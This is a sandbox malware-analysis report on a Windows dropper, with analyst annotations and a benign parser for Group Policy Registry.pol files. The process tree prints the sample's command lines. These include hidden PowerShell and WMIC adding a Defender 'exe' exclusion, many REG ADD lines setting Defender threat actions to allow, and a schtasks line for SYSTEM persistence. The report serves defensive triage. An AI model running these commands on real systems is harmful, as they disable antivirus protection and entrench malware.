Analysis
max time kernel: 163s
max time network: 298s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 11/07/2024, 22:34
Static task: static1
Behavioral task: behavioral1
Sample: 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe
Resource: win7-20240704-en
General
Target: 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe
Size: 7.2MB
MD5: b31e27b00781e72004147d1d49675fef
SHA1: 8a7529ea0b52c8cdf2ee0c85ec0af09dcd9c157f
SHA256: 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad
SHA512: 35310f9a55916758403f212344758156cf56a90c8cbab4d0d87e0e96db9a94da8526b5df7083e4b26938da9dd79ed201bc1950a320c1fee162a4098ccb188044
SSDEEP: 196608:91OHzJaVk0fZhEF8H7v5467/tfE/UOYAOC2oMbnus8G8:3OHzJaVpEF8bq67/tcULCXMCsF8
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow | pid  | Process
34   | 4856 | rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid  | Process
528  | powershell.exe
1616 | powershell.EXE
2152 | powershell.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description       | ioc                                                              | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description       | ioc                                                                                                  | Process
Key value queried | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation | mdAXtPS.exe
Executes dropped EXE 4 IoCs
pid  | Process
3768 | Install.exe
4920 | Install.exe
712  | Install.exe
5032 | mdAXtPS.exe
Loads dropped DLL 1 IoCs
pid  | Process
4856 | rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
description  | ioc                                                                                                                        | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json   | mdAXtPS.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | mdAXtPS.exe
Two extensions (IDs agcghmjnenlfcjmnldooeaadankclolo and oikgcnjambfooaigmdljblbaeelmekem) are written straight into the profile's Extensions directory, bypassing the Web Store. Files on disk alone do not make Chrome load an extension: it also has to be registered in the profile's Preferences / Secure Preferences (which are HMAC-protected) or force-installed through policy, so when triaging a host check those as well as the directory.
Drops desktop.ini file(s) 1 IoCs
description                  | ioc                                  | Process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | Install.exe
S-1-5-18 is the LocalSystem SID, so the Install.exe instance touching this recycle bin is running as SYSTEM (the scheduled-task instance, PID 712, in the process tree below).
Drops file in System32 directory 33 IoCs
Apart from the three GroupPolicy entries, every path sits under C:\Windows\SysWOW64\config\systemprofile, the LocalSystem user profile; a process only writes its per-user caches there when it runs as SYSTEM, which fits the /RU "SYSTEM" scheduled task in the process tree. Grouped by what they are:

Local Group Policy store (the entries worth pulling; what policy they set has to be read from the file)
description                  | ioc                                                  | Process
File created                 | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | Install.exe
File created                 | C:\Windows\system32\GroupPolicy\gpt.ini              | Install.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | mdAXtPS.exe

PowerShell and CLR start-up artifacts in the SYSTEM profile (powershell.exe ran as SYSTEM)
File created                 | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (2 entries) | powershell.exe
File created                 | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe

CryptoAPI URL cache under C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache (CRL/OCSP/AIA fetches by a SYSTEM process; the file names are hashes of the fetched URLs, and each MetaData file records the URL in clear, which is the useful part)
File opened for modification | CryptnetUrlCache\Content\<name> and CryptnetUrlCache\MetaData\<name> for each of E52E4DB9468EB31D663A0754C2775A04, 103621DE9CD5414CC2538780B4B75751, 05DDC6AA91765AACACDB0A5F96DF8199, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157, 24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA, DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9, B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9, B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 (16 entries) | mdAXtPS.exe
File opened for modification | the directories CryptnetUrlCache, CryptnetUrlCache\Content, CryptnetUrlCache\MetaData and ...\AppData\LocalLow\Microsoft (4 entries) | mdAXtPS.exe

WinINet cache under C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows (HTTP activity by a SYSTEM process)
File opened for modification | ...\Windows\INetCache\counters2.dat | rundll32.exe
File opened for modification | ...\Windows\INetCache\counters2.dat | mdAXtPS.exe
File opened for modification | ...\Windows\INetCache\Content.IE5, ...\Windows\INetCache\IE, ...\Windows\INetCookies, ...\Windows\History\History.IE5 (4 entries) | mdAXtPS.exe

The CryptnetUrlCache and WinINet rows are what CryptoAPI and WinINet leave behind whenever a process does certificate checks or HTTP from a fresh profile; on their own they show that mdAXtPS.exe and rundll32.exe ran as SYSTEM and talked to the network, not that the files are malicious. The Registry.pol / gpt.ini pair is different: that is the machine's local GPO store being written by a dropper.
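Registry.pol is the local GPO's registry-policy file in the PReg format (the header "PReg" plus a version DWORD of 1, followed by [key;value;type;size;data] records in which the brackets and semicolons are UTF-16LE characters and key and value are NUL-terminated UTF-16LE strings), so the file that Install.exe creates and mdAXtPS.exe modifies can be read directly instead of guessing what policy was set. The parser below is an added example, not tria.ge output and not the sample's own code; the entries it builds and parses are constructed for the demonstration and say nothing about what this sample actually wrote. Saved as preg.py (file name assumed), it reads the dropped file with python preg.py C:\Windows\System32\GroupPolicy\Machine\Registry.pol and prints one line per record.

```python
"""Parse and build Registry.pol (PReg) files, the registry-policy store under
C:\\Windows\\System32\\GroupPolicy\\<Machine|User>\\Registry.pol.
Added example for the report above; sample entries are constructed."""
import struct
import sys

REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD",
             7: "REG_MULTI_SZ", 11: "REG_QWORD"}


def _u16(s: str) -> bytes:
    return s.encode("utf-16-le")


def build_preg(entries):
    """Serialise (key, value_name, reg_type, data) tuples into a PReg v1 blob.
    Record layout: [key;value;type;size;data], separators as UTF-16LE chars."""
    out = bytearray(b"PReg" + struct.pack("<I", 1))
    for key, value, rtype, data in entries:
        if rtype in (1, 2):                       # REG_SZ / REG_EXPAND_SZ
            raw = _u16(data + "\x00")
        elif rtype == 7:                          # REG_MULTI_SZ
            raw = _u16("\x00".join(data) + "\x00\x00")
        elif rtype == 4:                          # REG_DWORD
            raw = struct.pack("<I", data)
        elif rtype == 11:                         # REG_QWORD
            raw = struct.pack("<Q", data)
        else:                                     # REG_BINARY or unknown: raw bytes
            raw = bytes(data)
        out += _u16("[") + _u16(key + "\x00") + _u16(";") + _u16(value + "\x00") + _u16(";")
        out += struct.pack("<I", rtype) + _u16(";") + struct.pack("<I", len(raw)) + _u16(";")
        out += raw + _u16("]")
    return bytes(out)


def _read_sz(blob: bytes, pos: int):
    """Read a NUL-terminated UTF-16LE string starting at an even offset."""
    end = pos
    while blob[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(blob):
            raise ValueError("unterminated string")
    return blob[pos:end].decode("utf-16-le"), end + 2


def _expect(blob: bytes, pos: int, ch: str) -> int:
    if blob[pos:pos + 2] != _u16(ch):
        raise ValueError(f"expected {ch!r} at offset {pos}")
    return pos + 2


def _decode(rtype: int, raw: bytes):
    if rtype in (1, 2):
        return raw.decode("utf-16-le").rstrip("\x00")
    if rtype == 7:
        return [s for s in raw.decode("utf-16-le").split("\x00") if s]
    if rtype == 4 and len(raw) == 4:
        return struct.unpack("<I", raw)[0]
    if rtype == 11 and len(raw) == 8:
        return struct.unpack("<Q", raw)[0]
    return raw.hex()


def parse_preg(blob: bytes):
    """Return [(key, value_name, type_name, decoded_data), ...].
    Value names starting with ** (e.g. **DelVals., **DeleteKeys) are deletion
    directives the policy engine applies, not values that get set."""
    if blob[:4] != b"PReg":
        raise ValueError("missing PReg signature")
    version = struct.unpack_from("<I", blob, 4)[0]
    if version != 1:
        raise ValueError(f"unsupported PReg version {version}")
    pos, entries = 8, []
    while pos < len(blob):
        pos = _expect(blob, pos, "[")
        key, pos = _read_sz(blob, pos)
        pos = _expect(blob, pos, ";")
        value, pos = _read_sz(blob, pos)
        pos = _expect(blob, pos, ";")
        rtype = struct.unpack_from("<I", blob, pos)[0]
        pos = _expect(blob, pos + 4, ";")
        size = struct.unpack_from("<I", blob, pos)[0]
        pos = _expect(blob, pos + 4, ";")
        raw, pos = blob[pos:pos + size], pos + size
        pos = _expect(blob, pos, "]")
        entries.append((key, value, REG_TYPES.get(rtype, f"type {rtype}"), _decode(rtype, raw)))
    return entries


# Constructed sample policy (hypothetical keys); not what this sample wrote.
SAMPLE_ENTRIES = [
    (r"Software\Policies\Example\Browser", "HomepageLocation", 1, "https://example.invalid/"),
    (r"Software\Policies\Example\Browser", "DeveloperToolsDisabled", 4, 1),
    (r"Software\Policies\Example\Browser\ForceList", "**DelVals.", 1, " "),
]

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_preg(SAMPLE_ENTRIES)
    for key, value, tname, data in parse_preg(blob):
        kind = "DIRECTIVE" if value.startswith("**") else tname
        print(f"{key}\\{value} [{kind}] = {data!r}")
```

Run against the dropped Registry.pol, the output lists every policy key and value the dropper set, plus any **Del directives that wipe existing policy, which is what decides whether the sample is forcing browser policy, Defender policy or something else.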
Drops file in Program Files directory 14 IoCs
All 14 are by mdAXtPS.exe.

Random-named directories holding a DLL (and usually an XML file next to it)
description  | ioc
File created | C:\Program Files (x86)\ixMyiQryENPMC\ccxxcZX.dll
File created | C:\Program Files (x86)\ixMyiQryENPMC\CuTPMYm.xml
File created | C:\Program Files (x86)\WIQLPldOU\HKgHFn.dll
File created | C:\Program Files (x86)\WIQLPldOU\dRuFPYX.xml
File created | C:\Program Files (x86)\qMeQRvtmXyxU2\qHQKfgCHjFinf.dll
File created | C:\Program Files (x86)\qMeQRvtmXyxU2\jJQVFBu.xml
File created | C:\Program Files (x86)\fjxFshYjVWUn\oqAnAvR.dll
File created | C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\PHBWplQ.dll
File created | C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\GylyHog.xml

Firefox install directory
File created                 | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
File created                 | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja

The dropped DLLs are the candidates for the "Loads dropped DLL" hit on rundll32.exe above. The Firefox part is a modification of the browser itself, not an add-on the user can see or disable in about:addons: browser\features is where Firefox keeps its bundled system add-ons, and omni.ja is the archive holding the browser's own packaged chrome and JavaScript; the .bak copy written alongside is the original. Writing to both requires the SYSTEM/admin context the task provides, and cleanup means replacing omni.ja and removing the foreign .xpi, or reinstalling Firefox.
Drops file in Windows directory 4 IoCs
description  | ioc                                     | Process
File created | C:\Windows\Tasks\AxfyqSaZTcFttLJtv.job  | schtasks.exe
File created | C:\Windows\Tasks\zuAKRFeuERsPXGg.job    | schtasks.exe
File created | C:\Windows\Tasks\cTixPRTTdvXlYhynT.job  | schtasks.exe
File created | C:\Windows\Tasks\blQxnfAaNNFZMWpemd.job | schtasks.exe
.job files in C:\Windows\Tasks are the Task Scheduler 1.0 format; schtasks writes one there when a task is created with /V1 (as in the captured command line below), whereas current-format tasks live as XML under C:\Windows\System32\Tasks. A hunt that only enumerates the XML store will miss these four.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
pid  | pid_target | Process      | procid_target
2296 | 712        | WerFault.exe | 84
4656 | 4920       | WerFault.exe | 74
204  | 5032       | WerFault.exe | 154
All three crashed processes are dropped executables: the two Install.exe instances (PIDs 4920 and 712) and mdAXtPS.exe (PID 5032).
Enumerates system info in registry 2 TTPs 4 IoCs
description       | ioc                                                               | Process
Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
Every row is under \REGISTRY\USER\.DEFAULT, the hive LocalSystem gets as its HKCU, which again places this activity in the SYSTEM scheduled-task context rather than the submitting user's session. Grouped by process:

powershell.exe, Key created (the bulk of the 64 rows): \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\<store>\{Certificates,CRLs,CTLs} and \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\<store>\{Certificates,CRLs,CTLs} for the stores CA, Root, trust, TrustedPeople, SmartCardRoot and Disallowed (several listed more than once), plus \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (2 rows). These are the empty certificate-store keys CryptoAPI creates the first time a profile verifies a signature or CRL; noise in themselves, but they confirm PowerShell ran under a fresh SYSTEM profile.
powershell.exe, Set value (data): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (a UTF-16LE multi-string: "en-US", "en").
Install.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume; Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc2686-0000-0000-0000-d01200000000}\MaxCapacity = "14116"; Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6". Recycle-bin bookkeeping by the shell, matching the C:\$RECYCLE.BIN\S-1-5-18\desktop.ini write above.
rundll32.exe: Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:".
mdAXtPS.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\; Set value (int) ...\Internet Settings\ZoneMap\IntranetName = "1"; Set value (int) ...\Internet Settings\ZoneMap\UNCAsIntranet = "1"; Set value (str) ...\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"; Key created ...\WinTrust\Trust Providers\Software Publishing. The ZoneMap and CachePrefix values are the defaults urlmon/WinINet write on first use in a profile that has never used them, so read these as "mdAXtPS.exe did WinINet network activity as SYSTEM", not as a deliberate zone reconfiguration.
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  | Process
4580 | schtasks.exe
3076 | schtasks.exe
4616 | schtasks.exe
4224 | schtasks.exe
2580 | schtasks.exe
32   | schtasks.exe
3252 | schtasks.exe
168  | schtasks.exe
4592 | schtasks.exe
2408 | schtasks.exe
Ten schtasks invocations against four .job files dropped. The only command line captured in the process tree below is PID 3076: a once-off task at 22:35:00 (one minute after the 22:34 submission) that re-runs the dropped Install.exe as SYSTEM with /V1 /F. The other nine invocations fall outside the part of the tree rendered here.
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid  | Process
528  | powershell.exe (3 rows)
4856 | powershell.exe (3 rows)
3860 | powershell.exe (3 rows)
1616 | powershell.EXE (3 rows)
2152 | powershell.exe (3 rows)
5032 | mdAXtPS.exe (all remaining rows, the large majority of the 64)
Suspicious use of AdjustPrivilegeToken 64 IoCs
description (Token:)                                                                                                             | pid  | Process
SeDebugPrivilege                                                                                                                 | 528  | powershell.exe
SeDebugPrivilege                                                                                                                 | 4856 | powershell.exe
SeDebugPrivilege                                                                                                                 | 3860 | powershell.exe
SeDebugPrivilege                                                                                                                 | 1616 | powershell.EXE
SeDebugPrivilege                                                                                                                 | 2152 | powershell.exe
SeIncreaseQuota, SeSecurity, SeTakeOwnership, SeLoadD river, SeSystemProfile, SeSystemtime, SeProfSingleProcess, SeIncBasePriority, SeCreatePagefile, SeBackup, SeRestore, SeShutdown, SeDebug, SeSystemEnvironment, SeRemoteShutdown, SeUndock, SeManageVolume, 33, 34, 35, 36 (the whole set enabled twice: 42 rows) | 4136 | WMIC.exe
SeAssignPrimaryToken, SeIncreaseQuota, SeSecurity, SeTakeOwnership, SeLoadDriver, SeSystemtime, SeBackup, SeRestore, SeShutdown, SeSystemEnvironment, SeUndock, SeManageVolume, then again SeAssignPrimaryToken through SeLoadDriver (17 rows; the table stops at its 64-row limit) | 3032 | WMIC.exe
The unnamed tokens 33 to 36 are privilege LUIDs the sandbox did not resolve; in winnt.h numbering they are SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34), SeCreateSymbolicLinkPrivilege (35) and SeDelegateSessionUserImpersonatePrivilege (36). wmic.exe enables every privilege present in its token when it starts, so these two rows describe the tokens each WMIC instance ran with rather than anything the sample asked for: PID 4136 (the Defender-exclusion call under the user's process chain) holds a full administrator set, while PID 3032 holds SeAssignPrimaryTokenPrivilege, which interactive administrator tokens do not have and service/SYSTEM tokens do.
Suspicious use of WriteProcessMemory 64 IoCs
Every parent-to-child pair below appears three times in the raw table: these are the writes a parent makes into a child it has just created, the normal CreateProcess pattern on this Windows build, not injection into a foreign process. The last pair has a single row because the table stops at 64. procid_target is tria.ge's own index for the child.
parent PID | parent                                                                | child PID | procid_target
1468       | 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe | 3768      | 73
3768       | Install.exe                                                           | 4920      | 74
4920       | Install.exe                                                           | 1616      | 76
1616       | forfiles.exe                                                          | 5044      | 78
5044       | cmd.exe                                                               | 528       | 79
528        | powershell.exe                                                        | 4136      | 80
4920       | Install.exe                                                           | 3076      | 82
712        | Install.exe                                                           | 4856      | 85
4856       | powershell.exe                                                        | 1000      | 87
1000       | cmd.exe                                                               | 4760      | 88
4856       | powershell.exe                                                        | 4388      | 89
4856       | powershell.exe                                                        | 1608      | 90
4856       | powershell.exe                                                        | 2120      | 91
4856       | powershell.exe                                                        | 5084      | 92
4856       | powershell.exe                                                        | 1816      | 93
4856       | powershell.exe                                                        | 3616      | 94
4856       | powershell.exe                                                        | 4428      | 95
4856       | powershell.exe                                                        | 2360      | 96
4856       | powershell.exe                                                        | 4604      | 97
4856       | powershell.exe                                                        | 3800      | 98
4856       | powershell.exe                                                        | 3824      | 99
4856       | powershell.exe                                                        | 1432      | 100 (single row)
Children 4604, 3800, 3824 and 1432 lie past the point where the process tree below is cut off, so they are known only from these edges.
Processes
-
C:\Users\Admin\AppData\Local\Temp\56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe"C:\Users\Admin\AppData\Local\Temp\56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Users\Admin\AppData\Local\Temp\7zS86B4.tmp\Install.exe.\Install.exe /BRSVdidGUSXG "385132" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "blQxnfAaNNFZMWpemd" /SC once /ST 22:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS86B4.tmp\Install.exe\" XC /jHfdidTVK 385132 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 8204⤵
- Program crash
PID:4656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86B4.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS86B4.tmp\Install.exe XC /jHfdidTVK 385132 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4856
C:\Windows\SysWOW64\cmd.exe  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 3⤵
- Suspicious use of WriteProcessMemory
PID:1000
C:\Windows\SysWOW64\reg.exe  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 4⤵ PID:4760
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 3⤵ PID:4388
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 3⤵ PID:1608
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 3⤵ PID:2120
